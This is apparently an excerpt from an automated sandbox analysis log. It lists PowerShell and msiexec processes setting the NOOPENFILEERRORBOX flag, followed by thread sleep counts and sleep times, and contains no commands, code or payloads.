          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4752Thread sleep count: 3168 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3156Thread sleep count: 2692 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6048Thread sleep time: -4611686018427385s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6320Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6544Thread sleep count: 2062 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6544Thread sleep count: 2470 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5944Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1264Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6616Thread sleep count: 2824 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6616Thread sleep count: 2044 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3528Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 244Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1448Thread sleep count: 3914 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1448Thread sleep count: 2989 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3540Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4016Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6048Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3936Thread sleep count: 2606 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3936Thread sleep count: 6055 > 30
